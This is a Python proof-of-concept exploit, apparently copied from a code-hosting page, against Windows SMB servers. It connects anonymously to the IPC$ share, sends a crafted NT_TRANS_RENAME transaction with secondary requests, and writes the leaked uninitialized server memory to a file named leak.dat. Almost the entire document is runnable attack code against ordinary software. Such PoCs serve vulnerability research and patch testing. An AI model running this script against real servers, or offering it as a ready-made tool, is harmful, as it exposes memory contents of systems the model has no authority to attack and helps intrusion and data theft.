47 lines
1.1 KiB
Python
47 lines
1.1 KiB
Python
|
#!/usr/bin/python
|
||
|
|
from impacket import smb
|
||
|
|
from mysmb import MYSMB
|
||
|
|
from struct import pack
|
||
|
|
import sys
|
||
|
|
|
||
|
|
'''
|
||
|
|
PoC: demonstates leaking information from uninitialize buffer
|
||
|
|
'''
|
||
|
|
|
||
|
|
USERNAME = ''
|
||
|
|
PASSWORD = ''
|
||
|
|
|
||
|
|
if len(sys.argv) != 3:
|
||
|
|
print("{} <ip> <pipe_name>".format(sys.argv[0]))
|
||
|
|
sys.exit(1)
|
||
|
|
|
||
|
|
target = sys.argv[1]
|
||
|
|
pipe_name = sys.argv[2]
|
||
|
|
|
||
|
|
conn = MYSMB(target)
|
||
|
|
|
||
|
|
conn.login(USERNAME, PASSWORD)
|
||
|
|
|
||
|
|
tid = conn.tree_connect_andx('\\\\'+target+'\\'+'IPC$')
|
||
|
|
conn.set_default_tid(tid)
|
||
|
|
fid = conn.nt_create_andx(tid, pipe_name) # any valid share name should be OK
|
||
|
|
|
||
|
|
# create NT_TRANS_RENAME (5) request
|
||
|
|
mid = conn.next_mid()
|
||
|
|
conn.send_nt_trans(5, mid=mid, param=pack('<HH', fid, 0), data='A'*0x1000, totalDataCount=0x8000)
|
||
|
|
|
||
|
|
# send secondary to set data at displacement 0 to leave uninitialize data in InData
|
||
|
|
for i in range(7):
|
||
|
|
conn.send_nt_trans_secondary(mid, data='B'*0x1000)
|
||
|
|
|
||
|
|
data = conn.recv_transaction_data(mid, 0x8000)
|
||
|
|
|
||
|
|
# no write parameter
|
||
|
|
open('leak.dat', 'wb').write(data[4:])
|
||
|
|
print('All return data is written to leak.dat')
|
||
|
|
|
||
|
|
conn.close(tid, fid)
|
||
|
|
conn.disconnect_tree(tid)
|
||
|
|
conn.logoff()
|
||
|
|
conn.get_socket().close()
|